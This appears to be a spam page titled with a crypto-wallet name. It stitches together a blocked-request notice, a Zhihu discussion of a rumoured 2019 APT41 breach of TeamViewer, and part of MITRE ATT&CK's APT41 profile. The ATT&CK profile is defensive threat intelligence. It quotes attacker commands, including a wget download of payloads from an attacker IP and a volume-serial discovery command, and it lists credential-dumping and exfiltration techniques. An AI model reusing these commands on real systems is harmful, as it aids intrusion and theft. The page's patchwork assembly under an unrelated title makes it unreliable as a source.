比特派钱包地址|apt41

作者: 比特派钱包地址
2024-03-07 17:03:43

This site has determined a security issue with your request.

This site has determined a security issue with your request.

We're sorry...

The request has been blocked.

Return to the homepage

如何看待深圳市网络信息安全中心通报TeamViewer被APT41攻击? - 知乎

如何看待深圳市网络信息安全中心通报TeamViewer被APT41攻击? - 知乎首页知乎知学堂发现等你来答​切换模式登录/注册深圳市TeamViewer网络信息安全如何看待深圳市网络信息安全中心通报TeamViewer被APT41攻击?[图片] 此次危害如何?普通人应该如何应对?显示全部 ​关注者290被浏览151,884关注问题​写回答​邀请回答​好问题​3 条评论​分享​44 个回答默认排序云子可信企业 IT 从未如此简单​ 关注TeamViewer被黑?请冷静的看待整个事件。深圳网警在微博发布《关于TeamViewer客户端被远程控制的紧急通报》,称近期有境外黑客组织APT41对TeamViewer实施了网络攻击,并成功拿下TeamViewer公司的后台管理系统,使得黑客组织可以访问并控制任何安装了TeamViewer的客户端。10.12日深圳网警发布微博 其实早在11日,深圳网警就已经发出通报文件,并在文件中披露事件解决办法,文件截图如下:事件的严重程度是极高的,百科也在第一时间披露了此次事件TeamViewer早已家喻户晓,功能不需要再赘述,这款软件服务于个人用户的同时更多的实际上是面向于企业级用户的,企业用户使用这款软件进行各类远程操作,一旦TeamViewer被攻破,黑客可以随意窃取任意一家使用了TeamViewer作为远程工具的企业信息,一旦企业的机密信息泄露,后果不言而喻,此条信息被各大论坛、门户疯狂转发。各家企业的网络管理员人人自危,一时间TeamViewer的卸载弹窗弹个不停。云子菌从事网络安全行业,对此类事件极其敏感,云子菌记得第一次看到APT41这个所谓黑客组织的名字,是来自美国安全公司火眼的一则新闻,约莫是19年8月的一则新闻,火眼声称APT41一家来自我国的黑客组织,并且自12年起,致力于攻击包括美国、英国和香港等 14 个国家和地区,基于境外对我国的态度,本次攻击事件应当已经在国外炸开了锅,于是云子菌去瞧了瞧。结果是 —— 一切正常。TeamViewer官方并没有出台任何相关安全警告如若出现严重的安全问题,TeamViewer必须提早,提前通知所有用户,这是任何一个企业级产品的安全协议中必然存在的条目,一旦出现安全危机,TeamViewer处理不得当,品牌信誉受损的同时将面临巨额的赔偿。(并不会存在TeamViewer遇到攻击隐藏不报的情况)云子还是不死心,在一些不存在的网站上再次仔细搜索了信息,结果是全部的TeamViewer被攻击信息均来自于深圳网警发布的通报文件。正当云子菌想再次确认深圳网警的那篇通报微博的时候吗,那篇微博竟然找不到了。深圳网警微博深圳网警删除了那篇TeamViewer被攻击的通报微博。云子菌开始怀疑此次攻击事情的真实性,于是再次在国内搜索了有关攻击的信息,云子菌发现,最早的攻击信息来源于twitter的一名博主Christopher Glyer,该博主是美国安全公司火眼的安全架构师。博主截图以下是此博主发布的TeamViewer被攻击信息:博文截图这是仅有的内容Christopher Glyer发布的截图是来自于火眼安全大会上的17张ppt之一,单凭本张ppt并不能确认TeamViewer就是被黑了,且Christopher Glyer并没有回应其他twitter博主的疑问,并以不能透露受害人信息为由,拒绝透露任何相关信息。火眼向来不是一家好名声的安全公司,按照火眼以往一贯的作风,云子推测,此次事件极大可能是火眼安全为了炒作自家安全产品放出的一则迷惑性新闻,深圳网警错误的理解了这个信息,结果是闹了个大乌龙。愿大家都能冷静的看待突发事件。云子也推荐下自家的远程产品,云子可信终端管理软件,有兴趣的同学可以进官网了解详情。编辑于 2019-12-16 17:32​赞同 180​​36 条评论​分享​收藏​喜欢收起​火绒安全​已认证账号​ 关注在11日FireEye公司举办的安全会上,有演讲的PPT以照片形式被他人公布出来,并配以 “TeamViewer曾经被黑客组织APT41入侵过,且该组织可以访问任何安装TeamViewer系统”的文字,引发关注。火绒也收到不少用户的询问,我们对整个事件做了了解后,将情况做了大致的梳理。火绒工程师根据网传的照片找到FireEye的报告(如下图),发现照片的转发语和FireEye实际的PPT表达内容不相符:1、从FireEye的报告来看,他们并没有掌握直接证据表明APT41入侵TeamViewer公司。网传照片中是仅显示FireEye发现在 2017-2018年期间,有APT41利用TeamViewer的登录凭证登陆被攻击主机的行为。2、根据FireEye的PPT中显示,TeamViewer公司在 2016年被黑客入侵过(由其它媒体报道过)。而当时TeamViewer也回应过入侵事件,并表示未发现泄露数据的证据。总结:从现有信息来看无论是时间还是逻辑上,FireEye发现的2017-2018“利用TeamViewer的登录凭证”与TeamViewer2016年被攻击的事件没有必然的联系,也无从证明TeamViewer近期被攻击并访问用户系统。因此,TeamViewer用户也无须过分担心,火绒会持续关注此事件的发展。​安全建议:1、远程控制类软件在需要时打开,避免有潜在漏洞被黑客利用的风险;2、关注软件厂商对软件发布的修复公告,保持软件及时更新;3、对于火绒企业版的用户,可使用“火绒企业版”-“远程桌面”代替使用。最后,火绒也会持续关注此事件的发展,随时跟进更多相关信息。发布于 2019-10-12 17:42​赞同 125​​10 条评论​分享​收藏​喜欢

APT41, Wicked Panda, Group G0096 | MITRE ATT&CK®

APT41, Wicked Panda, Group G0096 | MITRE ATT&CK®

Matrices

Enterprise

Mobile

ICS

Tactics

Enterprise

Mobile

ICS

Techniques

Enterprise

Mobile

ICS

Defenses

Data Sources

Mitigations

Enterprise

Mobile

ICS

Assets

CTI

Groups

Software

Campaigns

Resources

Get Started

Learn More about ATT&CK

ATT&CK Data & Tools

FAQ

Engage with ATT&CK

Version History

Legal & Branding

Benefactors

Blog 

Search

Thank you to SOC Prime for becoming ATT&CK's first Benefactor. To join them, or learn more about this program visit our Benefactors page.

Home

Groups

APT41

APT41

APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.[1][2]

ID: G0096

Associated Groups: Wicked Panda

Contributors: Kyaw Pyiyt Htet, @KyawPyiytHtet

Version: 3.1

Created: 23 September 2019

Last Modified: 23 March 2023

Version Permalink

Live Version

Associated Group Descriptions

Name

Description

Wicked Panda

[3]

Campaigns

ID

Name

First Seen

Last Seen

References

Techniques

C0017

C0017

May 2021 [4]

February 2022 [4]

[4]

Access Token Manipulation,

Application Layer Protocol: Web Protocols,

Archive Collected Data: Archive via Custom Method,

Command and Scripting Interpreter: JavaScript,

Command and Scripting Interpreter: Windows Command Shell,

Data from Local System,

Data Obfuscation: Protocol Impersonation,

Data Staged: Local Data Staging,

Deobfuscate/Decode Files or Information,

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol,

Exfiltration Over C2 Channel,

Exfiltration Over Web Service,

Exploit Public-Facing Application,

Exploitation for Privilege Escalation,

Hijack Execution Flow,

Ingress Tool Transfer,

Masquerading: Masquerade Task or Service,

Masquerading: Match Legitimate Name or Location,

Obfuscated Files or Information: Software Packing,

Obfuscated Files or Information,

Obtain Capabilities: Tool,

OS Credential Dumping: Security Account Manager,

Proxy,

Scheduled Task/Job: Scheduled Task,

Server Software Component: Web Shell,

System Information Discovery,

System Network Configuration Discovery,

System Owner/User Discovery,

Web Service: Dead Drop Resolver,

Web Service

ATT&CK® Navigator Layers

Enterprise Layer

download

view

Techniques Used

Domain

ID

Name

Use

Enterprise

T1134

Access Token Manipulation

During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local NT AUTHORITY\SYSTEM privilege escalation.[4]

Enterprise

T1098

Account Manipulation

APT41 has added user accounts to the User and Admin groups.[1]

Enterprise

T1071

.001

Application Layer Protocol: Web Protocols

APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.[5] During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.[4]

.002

Application Layer Protocol: File Transfer Protocols

APT41 used exploit payloads that initiate download via ftp.[5]

.004

Application Layer Protocol: DNS

APT41 used DNS for C2 communications.[1][2]

Enterprise

T1560

.001

Archive Collected Data: Archive via Utility

APT41 created a RAR archive of targeted files for exfiltration.[1]

.003

Archive Collected Data: Archive via Custom Method

During C0017, APT41 hex-encoded PII data prior to exfiltration.[4]

Enterprise

T1197

BITS Jobs

APT41 used BITSAdmin to download and install payloads.[5][3]

Enterprise

T1547

.001

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

APT41 created and modified startup files for persistence.[1][2] APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.[5]

Enterprise

T1110

.002

Brute Force: Password Cracking

APT41 performed password brute-force attacks on the local admin account.[1]

Enterprise

T1059

.001

Command and Scripting Interpreter: PowerShell

APT41 leveraged PowerShell to deploy malware families in victims’ environments.[1][5]

.003

Command and Scripting Interpreter: Windows Command Shell

APT41 used cmd.exe /c to execute commands on remote machines.[1]APT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.[5]During C0017, APT41 used cmd.exe to execute reconnaissance commands.[4]

.004

Command and Scripting Interpreter: Unix Shell

APT41 executed file /bin/pwd in activity exploiting CVE-2019-19781 against Citrix devices.[5]

.007

Command and Scripting Interpreter: JavaScript

During C0017, APT41 deployed JScript web shells on compromised systems.[4]

Enterprise

T1136

.001

Create Account: Local Account

APT41 has created user accounts.[1]

Enterprise

T1543

.003

Create or Modify System Process: Windows Service

APT41 modified legitimate Windows services to install malware backdoors.[1][2] APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.[5]

Enterprise

T1486

Data Encrypted for Impact

APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.[1]

Enterprise

T1005

Data from Local System

APT41 has uploaded files and data from a compromised host.[2]During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.[4]

Enterprise

T1001

.003

Data Obfuscation: Protocol Impersonation

During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.[4]

Enterprise

T1074

.001

Data Staged: Local Data Staging

During C0017, APT41 copied the local SAM and SYSTEM Registry hives to a staging directory.[4]

Enterprise

T1140

Deobfuscate/Decode Files or Information

During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.[4]

Enterprise

T1568

.002

Dynamic Resolution: Domain Generation Algorithms

APT41 has used DGAs to change their C2 servers monthly.[1]

Enterprise

T1546

.008

Event Triggered Execution: Accessibility Features

APT41 leveraged sticky keys to establish persistence.[1]

Enterprise

T1480

.001

Execution Guardrails: Environmental Keying

APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.[6]

Enterprise

T1048

.003

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.[4]

Enterprise

T1041

Exfiltration Over C2 Channel

During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.[4]

Enterprise

T1567

Exfiltration Over Web Service

During C0017, APT41 used Cloudflare services for data exfiltration.[4]

Enterprise

T1190

Exploit Public-Facing Application

APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.[5]During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.[4]

Enterprise

T1203

Exploitation for Client Execution

APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.[1]

Enterprise

T1068

Exploitation for Privilege Escalation

During C0017, APT41 abused named pipe impersonation for privilege escalation.[4]

Enterprise

T1133

External Remote Services

APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.[1]

Enterprise

T1008

Fallback Channels

APT41 used the Steam community page as a fallback mechanism for C2.[1]

Enterprise

T1083

File and Directory Discovery

APT41 has executed file /bin/pwd on exploited victims, perhaps to return architecture related information.[5]

Enterprise

T1574

.001

Hijack Execution Flow: DLL Search Order Hijacking

APT41 has used search order hijacking to execute malicious payloads, such as Winnti RAT.[3]

.002

Hijack Execution Flow: DLL Side-Loading

APT41 used legitimate executables to perform DLL side-loading of their malware.[1]

.006

Hijack Execution Flow: Dynamic Linker Hijacking

APT41 has configured payloads to load via LD_PRELOAD.[3]

Enterprise

T1070

.001

Indicator Removal: Clear Windows Event Logs

APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.[1]

.003

Indicator Removal: Clear Command History

APT41 attempted to remove evidence of some of its activity by deleting Bash histories.[1]

.004

Indicator Removal: File Deletion

APT41 deleted files from the system.[1]

Enterprise

T1105

Ingress Tool Transfer

APT41 used certutil to download additional files.[5][3][2]During C0017, APT41 downloaded malicious payloads onto compromised systems.[4]

Enterprise

T1056

.001

Input Capture: Keylogging

APT41 used a keylogger called GEARSHIFT on a target system.[1]

Enterprise

T1036

.004

Masquerading: Masquerade Task or Service

APT41 has created services to appear as benign system tools.[2]During C0017, APT41 used SCHTASKS /Change to modify legitimate scheduled tasks to run malicious code.[4]

.005

Masquerading: Match Legitimate Name or Location

APT41 attempted to masquerade their files as popular anti-virus software.[1][2]During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.[4]

Enterprise

T1112

Modify Registry

APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.[1][2]

Enterprise

T1104

Multi-Stage Channels

APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.[5]

Enterprise

T1046

Network Service Discovery

APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.[1]

Enterprise

T1135

Network Share Discovery

APT41 used the net share command as part of network reconnaissance.[1][2]

Enterprise

T1027

Obfuscated Files or Information

APT41 used VMProtected binaries in multiple intrusions.[5]During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.[4]

.002

Software Packing

During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.[4]

Enterprise

T1588

.002

Obtain Capabilities: Tool

APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.[1]For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.[4]

Enterprise

T1003

.001

OS Credential Dumping: LSASS Memory

APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.[1][2]

.002

OS Credential Dumping: Security Account Manager

During C0017, APT41 copied the SAM and SYSTEM Registry hives for credential harvesting.[4]

Enterprise

T1566

.001

Phishing: Spearphishing Attachment

APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.[1]

Enterprise

T1542

.003

Pre-OS Boot: Bootkit

APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.[1]

Enterprise

T1055

Process Injection

APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.[1]

Enterprise

T1090

Proxy

APT41 used a tool called CLASSFON to covertly proxy network communications.[1]During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.[4]

Enterprise

T1021

.001

Remote Services: Remote Desktop Protocol

APT41 used RDP for lateral movement.[1][3]

.002

Remote Services: SMB/Windows Admin Shares

APT41 has transferred implant files using Windows Admin Shares.[3]

Enterprise

T1496

Resource Hijacking

APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment.[1]

Enterprise

T1014

Rootkit

APT41 deployed rootkits on Linux systems.[1][3]

Enterprise

T1053

.005

Scheduled Task/Job: Scheduled Task

APT41 used a compromised account to create a scheduled task on a system.[1][3]During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: \Microsoft\Windows\PLA\Server Manager Performance Monitor, \Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults, and \Microsoft\Windows\WDI\USOShared.[4]

Enterprise

T1505

.003

Server Software Component: Web Shell

During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.[4]

Enterprise

T1553

.002

Subvert Trust Controls: Code Signing

APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.[1][2]

Enterprise

T1195

.002

Supply Chain Compromise: Compromise Software Supply Chain

APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.[1]

Enterprise

T1218

.001

System Binary Proxy Execution: Compiled HTML File

APT41 used compiled HTML (.chm) files for targeting.[1]

.011

System Binary Proxy Execution: Rundll32

APT41 has used rundll32.exe to execute a loader.[3]

Enterprise

T1082

System Information Discovery

During C0017, APT41 issued ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+ commands to find the volume serial number of compromised systems.[4]

Enterprise

T1016

System Network Configuration Discovery

APT41 collected MAC addresses from victim machines.[1][2] During C0017, APT41 used cmd.exe /c ping %userdomain% for discovery.[4]

Enterprise

T1049

System Network Connections Discovery

APT41 has enumerated IP addresses of network resources and used the netstat command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.[1][2]

Enterprise

T1033

System Owner/User Discovery

APT41 used the WMIEXEC utility to execute whoami commands on remote machines.[1]During C0017, APT41 used whoami to gather information from victim machines.[4]

Enterprise

T1569

.002

System Services: Service Execution

APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.[5][2]

Enterprise

T1078

Valid Accounts

APT41 used compromised credentials to log on to other systems.[1][3]

Enterprise

T1102

.001

Web Service: Dead Drop Resolver

APT41 used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.[1]During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.[4]

Enterprise

T1047

Windows Management Instrumentation

APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.[1][2]

Software

ID

Name

References

Techniques

S0073

ASPXSpy

[1]

Server Software Component: Web Shell

S0190

BITSAdmin

[5]

BITS Jobs,

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol,

Ingress Tool Transfer,

Lateral Tool Transfer

S0069

BLACKCOFFEE

[1]

Command and Scripting Interpreter: Windows Command Shell,

File and Directory Discovery,

Indicator Removal: File Deletion,

Multi-Stage Channels,

Process Discovery,

Web Service: Dead Drop Resolver,

Web Service: Bidirectional Communication

S0160

certutil

[5]

Archive Collected Data: Archive via Utility,

Deobfuscate/Decode Files or Information,

Ingress Tool Transfer,

Subvert Trust Controls: Install Root Certificate

S0020

China Chopper

[1]

Application Layer Protocol: Web Protocols,

Brute Force: Password Guessing,

Command and Scripting Interpreter: Windows Command Shell,

Data from Local System,

File and Directory Discovery,

Indicator Removal: Timestomp,

Ingress Tool Transfer,

Network Service Discovery,

Obfuscated Files or Information: Software Packing,

Server Software Component: Web Shell

S0154

Cobalt Strike

[5][2]

Abuse Elevation Control Mechanism: Sudo and Sudo Caching,

Abuse Elevation Control Mechanism: Bypass User Account Control,

Access Token Manipulation: Parent PID Spoofing,

Access Token Manipulation: Token Impersonation/Theft,

Access Token Manipulation: Make and Impersonate Token,

Account Discovery: Domain Account,

Application Layer Protocol: DNS,

Application Layer Protocol: Web Protocols,

Application Layer Protocol: File Transfer Protocols,

BITS Jobs,

Browser Session Hijacking,

Command and Scripting Interpreter: JavaScript,

Command and Scripting Interpreter: Visual Basic,

Command and Scripting Interpreter: PowerShell,

Command and Scripting Interpreter: Python,

Command and Scripting Interpreter: Windows Command Shell,

Create or Modify System Process: Windows Service,

Data Encoding: Standard Encoding,

Data from Local System,

Data Obfuscation: Protocol Impersonation,

Data Transfer Size Limits,

Deobfuscate/Decode Files or Information,

Encrypted Channel: Asymmetric Cryptography,

Encrypted Channel: Symmetric Cryptography,

Exploitation for Client Execution,

Exploitation for Privilege Escalation,

File and Directory Discovery,

Hide Artifacts: Process Argument Spoofing,

Impair Defenses: Disable or Modify Tools,

Indicator Removal: Timestomp,

Ingress Tool Transfer,

Input Capture: Keylogging,

Modify Registry,

Native API,

Network Service Discovery,

Network Share Discovery,

Non-Application Layer Protocol,

Obfuscated Files or Information: Indicator Removal from Tools,

Obfuscated Files or Information,

Office Application Startup: Office Template Macros,

OS Credential Dumping: LSASS Memory,

OS Credential Dumping: Security Account Manager,

Permission Groups Discovery: Domain Groups,

Permission Groups Discovery: Local Groups,

Process Discovery,

Process Injection: Dynamic-link Library Injection,

Process Injection: Process Hollowing,

Process Injection,

Protocol Tunneling,

Proxy: Domain Fronting,

Proxy: Internal Proxy,

Query Registry,

Reflective Code Loading,

Remote Services: Remote Desktop Protocol,

Remote Services: SSH,

Remote Services: Windows Remote Management,

Remote Services: SMB/Windows Admin Shares,

Remote Services: Distributed Component Object Model,

Remote System Discovery,

Scheduled Transfer,

Screen Capture,

Software Discovery,

Subvert Trust Controls: Code Signing,

System Binary Proxy Execution: Rundll32,

System Network Configuration Discovery,

System Network Connections Discovery,

System Service Discovery,

System Services: Service Execution,

Use Alternate Authentication Material: Pass the Hash,

Valid Accounts: Domain Accounts,

Valid Accounts: Local Accounts,

Windows Management Instrumentation

S1052

DEADEYE

[4]

Command and Scripting Interpreter: Windows Command Shell,

Deobfuscate/Decode Files or Information,

Execution Guardrails,

Hide Artifacts: NTFS File Attributes,

Masquerading: Masquerade Task or Service,

Native API,

Obfuscated Files or Information,

Obfuscated Files or Information: Embedded Payloads,

Scheduled Task/Job,

System Binary Proxy Execution: Msiexec,

System Binary Proxy Execution: Rundll32,

System Information Discovery,

System Network Configuration Discovery

S0021

Derusbi

[1]

Audio Capture,

Command and Scripting Interpreter: Unix Shell,

Encrypted Channel: Symmetric Cryptography,

Fallback Channels,

File and Directory Discovery,

Indicator Removal: Timestomp,

Indicator Removal: File Deletion,

Input Capture: Keylogging,

Non-Application Layer Protocol,

Non-Standard Port,

Process Discovery,

Process Injection: Dynamic-link Library Injection,

Query Registry,

Screen Capture,

System Binary Proxy Execution: Regsvr32,

System Information Discovery,

System Owner/User Discovery,

Video Capture

S0105

dsquery

[4]

Account Discovery: Domain Account,

Domain Trust Discovery,

Permission Groups Discovery: Domain Groups,

System Information Discovery

S0363

Empire

[3]

Abuse Elevation Control Mechanism: Bypass User Account Control,

Access Token Manipulation: SID-History Injection,

Access Token Manipulation,

Access Token Manipulation: Create Process with Token,

Account Discovery: Domain Account,

Account Discovery: Local Account,

Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,

Application Layer Protocol: Web Protocols,

Archive Collected Data,

Automated Collection,

Automated Exfiltration,

Boot or Logon Autostart Execution: Security Support Provider,

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,

Boot or Logon Autostart Execution: Shortcut Modification,

Browser Information Discovery,

Clipboard Data,

Command and Scripting Interpreter: PowerShell,

Command and Scripting Interpreter: Windows Command Shell,

Command and Scripting Interpreter,

Create Account: Local Account,

Create Account: Domain Account,

Create or Modify System Process: Windows Service,

Credentials from Password Stores: Credentials from Web Browsers,

Domain Policy Modification: Group Policy Modification,

Domain Trust Discovery,

Email Collection: Local Email Collection,

Encrypted Channel: Asymmetric Cryptography,

Event Triggered Execution: Accessibility Features,

Exfiltration Over C2 Channel,

Exfiltration Over Web Service: Exfiltration to Code Repository,

Exfiltration Over Web Service: Exfiltration to Cloud Storage,

Exploitation for Privilege Escalation,

Exploitation of Remote Services,

File and Directory Discovery,

Group Policy Discovery,

Hijack Execution Flow: Path Interception by Unquoted Path,

Hijack Execution Flow: Path Interception by Search Order Hijacking,

Hijack Execution Flow: Path Interception by PATH Environment Variable,

Hijack Execution Flow: Dylib Hijacking,

Hijack Execution Flow: DLL Search Order Hijacking,

Indicator Removal: Timestomp,

Ingress Tool Transfer,

Input Capture: Keylogging,

Input Capture: Credential API Hooking,

Native API,

Network Service Discovery,

Network Share Discovery,

Network Sniffing,

Obfuscated Files or Information: Command Obfuscation,

OS Credential Dumping: LSASS Memory,

Process Discovery,

Process Injection,

Remote Services: Distributed Component Object Model,

Remote Services: SSH,

Scheduled Task/Job: Scheduled Task,

Screen Capture,

Software Discovery: Security Software Discovery,

Steal or Forge Kerberos Tickets: Kerberoasting,

Steal or Forge Kerberos Tickets: Golden Ticket,

Steal or Forge Kerberos Tickets: Silver Ticket,

System Information Discovery,

System Network Configuration Discovery,

System Network Connections Discovery,

System Owner/User Discovery,

System Services: Service Execution,

Trusted Developer Utilities Proxy Execution: MSBuild,

Unsecured Credentials: Credentials In Files,

Unsecured Credentials: Private Keys,

Use Alternate Authentication Material: Pass the Hash,

Video Capture,

Web Service: Bidirectional Communication,

Windows Management Instrumentation

S0095

ftp

[5]

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol,

Ingress Tool Transfer,

Lateral Tool Transfer

S0032

gh0st RAT

[1]

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,

Command and Scripting Interpreter,

Create or Modify System Process: Windows Service,

Data Encoding: Standard Encoding,

Deobfuscate/Decode Files or Information,

Dynamic Resolution: Fast Flux DNS,

Encrypted Channel: Symmetric Cryptography,

Encrypted Channel,

Hijack Execution Flow: DLL Side-Loading,

Indicator Removal: Clear Windows Event Logs,

Indicator Removal: File Deletion,

Ingress Tool Transfer,

Input Capture: Keylogging,

Modify Registry,

Native API,

Non-Application Layer Protocol,

Process Discovery,

Process Injection,

Query Registry,

Screen Capture,

Shared Modules,

System Binary Proxy Execution: Rundll32,

System Information Discovery,

System Services: Service Execution

S0100

ipconfig

[2]

System Network Configuration Discovery

S1051

KEYPLUG

[4]

Application Layer Protocol: Web Protocols,

Deobfuscate/Decode Files or Information,

Encrypted Channel: Asymmetric Cryptography,

Non-Application Layer Protocol,

Obfuscated Files or Information,

Proxy,

System Time Discovery,

Web Service: Dead Drop Resolver

S0443

MESSAGETAP

[7][3]

Archive Collected Data: Archive via Custom Method,

Automated Collection,

Data Staged: Local Data Staging,

Deobfuscate/Decode Files or Information,

File and Directory Discovery,

Indicator Removal: File Deletion,

Network Sniffing,

System Network Connections Discovery

S0002

Mimikatz

[1][2]

Access Token Manipulation: SID-History Injection,

Account Manipulation,

Boot or Logon Autostart Execution: Security Support Provider,

Credentials from Password Stores,

Credentials from Password Stores: Credentials from Web Browsers,

Credentials from Password Stores: Windows Credential Manager,

OS Credential Dumping: DCSync,

OS Credential Dumping: Security Account Manager,

OS Credential Dumping: LSASS Memory,

OS Credential Dumping: LSA Secrets,

Rogue Domain Controller,

Steal or Forge Authentication Certificates,

Steal or Forge Kerberos Tickets: Golden Ticket,

Steal or Forge Kerberos Tickets: Silver Ticket,

Unsecured Credentials: Private Keys,

Use Alternate Authentication Material: Pass the Hash,

Use Alternate Authentication Material: Pass the Ticket

S0039

Net

[1]

Account Discovery: Domain Account,

Account Discovery: Local Account,

Create Account: Local Account,

Create Account: Domain Account,

Indicator Removal: Network Share Connection Removal,

Network Share Discovery,

Password Policy Discovery,

Permission Groups Discovery: Domain Groups,

Permission Groups Discovery: Local Groups,

Remote Services: SMB/Windows Admin Shares,

Remote System Discovery,

System Network Connections Discovery,

System Service Discovery,

System Services: Service Execution,

System Time Discovery

S0104

netstat

[1]

System Network Connections Discovery

S0385

njRAT

[1]

Application Layer Protocol: Web Protocols,

Application Window Discovery,

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,

Command and Scripting Interpreter: PowerShell,

Command and Scripting Interpreter: Windows Command Shell,

Credentials from Password Stores: Credentials from Web Browsers,

Data Encoding: Standard Encoding,

Data from Local System,

Dynamic Resolution: Fast Flux DNS,

Exfiltration Over C2 Channel,

File and Directory Discovery,

Impair Defenses: Disable or Modify System Firewall,

Indicator Removal: File Deletion,

Indicator Removal: Clear Persistence,

Ingress Tool Transfer,

Input Capture: Keylogging,

Modify Registry,

Native API,

Non-Standard Port,

Obfuscated Files or Information,

Obfuscated Files or Information: Compile After Delivery,

Peripheral Device Discovery,

Process Discovery,

Query Registry,

Remote Services: Remote Desktop Protocol,

Remote System Discovery,

Replication Through Removable Media,

Screen Capture,

System Information Discovery,

System Owner/User Discovery,

Video Capture

S0097

Ping

[1][2]

Remote System Discovery

S0013

PlugX

[1]

Application Layer Protocol: Web Protocols,

Application Layer Protocol: DNS,

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,

Command and Scripting Interpreter: Windows Command Shell,

Create or Modify System Process: Windows Service,

Deobfuscate/Decode Files or Information,

Encrypted Channel: Symmetric Cryptography,

File and Directory Discovery,

Hide Artifacts: Hidden Files and Directories,

Hijack Execution Flow: DLL Side-Loading,

Hijack Execution Flow: DLL Search Order Hijacking,

Ingress Tool Transfer,

Input Capture: Keylogging,

Masquerading: Masquerade Task or Service,

Masquerading: Match Legitimate Name or Location,

Modify Registry,

Native API,

Network Share Discovery,

Non-Application Layer Protocol,

Obfuscated Files or Information,

Process Discovery,

Query Registry,

Screen Capture,

System Network Connections Discovery,

Trusted Developer Utilities Proxy Execution: MSBuild,

Virtualization/Sandbox Evasion: System Checks,

Web Service: Dead Drop Resolver

S0194

PowerSploit

[1]

Access Token Manipulation,

Account Discovery: Local Account,

Audio Capture,

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,

Boot or Logon Autostart Execution: Security Support Provider,

Command and Scripting Interpreter: PowerShell,

Create or Modify System Process: Windows Service,

Credentials from Password Stores: Windows Credential Manager,

Data from Local System,

Domain Trust Discovery,

Hijack Execution Flow: Path Interception by PATH Environment Variable,

Hijack Execution Flow: Path Interception by Unquoted Path,

Hijack Execution Flow: DLL Search Order Hijacking,

Hijack Execution Flow: Path Interception by Search Order Hijacking,

Input Capture: Keylogging,

